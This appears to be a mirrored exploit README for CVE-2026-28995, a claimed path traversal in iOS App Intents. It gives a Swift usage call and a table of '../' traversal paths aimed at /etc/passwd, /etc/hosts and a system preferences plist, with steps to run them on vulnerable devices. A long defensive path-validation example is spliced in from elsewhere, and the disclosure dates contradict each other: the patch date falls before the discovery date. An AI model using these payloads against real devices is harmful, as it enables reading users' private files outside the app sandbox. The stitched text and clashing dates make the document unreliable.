## https://sploitus.com/exploit?id=5E384957-8285-5247-95CE-C7384C91A926
# CVE-2026-28995
**Proof of Concept for CVE-2026-28995**: Path Traversal vulnerability in App Intents on iOS 26.4.2 and below.
## Description
This vulnerability allows a malicious app to **read any file** outside its sandbox via App Intents. The root cause is insufficient path validation in Apple's App Intents framework.
**Affected versions:** iOS 26.4.2 and below
**Patched in:** iOS 26.5 (May 11, 2026)
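
The kind of check the description above names as missing, shown as an added defensive example (not code from this repository and not Apple's patch): canonicalize the requested path, then confirm it still lies inside an allowed base directory. `resolveContained`, `PathError` and the `intent-data` directory are hypothetical names chosen for illustration.

```swift
import Foundation

enum PathError: Error { case absolutePath, unresolvable, escapesBase }

// Canonical path components as the file system reports them
// (symlinks followed, ".." collapsed). Throws if the item does not exist.
func canonicalComponents(of url: URL) throws -> [String] {
    let values = try url.resourceValues(forKeys: [.canonicalPathKey])
    guard let path = values.canonicalPath else { throw PathError.unresolvable }
    return URL(fileURLWithPath: path).pathComponents
}

// Hypothetical helper: returns the file URL only if `userPath`, resolved
// against `base`, still lies inside `base` after canonicalization.
func resolveContained(_ userPath: String, under base: URL) throws -> URL {
    // An absolute input has no business being joined to a base directory.
    guard !userPath.hasPrefix("/") else { throw PathError.absolutePath }

    let candidate = base.appendingPathComponent(userPath)
    let root = try canonicalComponents(of: base)
    let target = try canonicalComponents(of: candidate)

    // Compare whole components, not string prefixes, so a sibling such as
    // ".../intent-data-other" never passes as ".../intent-data".
    // Strictly deeper than the base: the base directory itself is refused.
    guard target.count > root.count,
          Array(target.prefix(root.count)) == root else {
        throw PathError.escapesBase
    }
    return candidate
}

// Constructed demo: the base directory and file names are assumptions.
let base = FileManager.default.temporaryDirectory
    .appendingPathComponent("intent-data", isDirectory: true)
try FileManager.default.createDirectory(at: base, withIntermediateDirectories: true)
try Data("ok".utf8).write(to: base.appendingPathComponent("note.txt"))

let inputs = ["note.txt",
              "../../../../../../../../../../../../../etc/passwd",
              "/etc/hosts"]
for input in inputs {
    do {
        let url = try resolveContained(input, under: base)
        print("allowed :", url.lastPathComponent)
    } catch {
        print("rejected:", input, "(\(error))")
    }
}
```

The check fails closed: a path that cannot be canonicalized (missing file, no permission) is rejected rather than passed through.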
## Usage
### 1. Function `readCve(path: String) -> String`
```swift
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
```
### 2. Path Examples
| Path | Reads |
| --- | --- |
| `../../../../../../../../../../../../../etc/passwd` | User passwords |
| `../../../../../../../../../../../../../etc/hosts` | Hosts file |
| `../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist` | System preferences |
### 3. Directory Handling
If the path points to a directory, the function returns:
```
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
```
## How to Run
1. Create an iOS project in Xcode.
2. Add `CVE-2026-28995.swift` to the project.
3. Call `readCve(path:)` with the target path.
4. Run on iOS 26.4.2 or earlier.
## Responsible Disclosure
**Discovered:** July 1, 2026
**Patched in:** iOS 26.5 (May 11, 2026)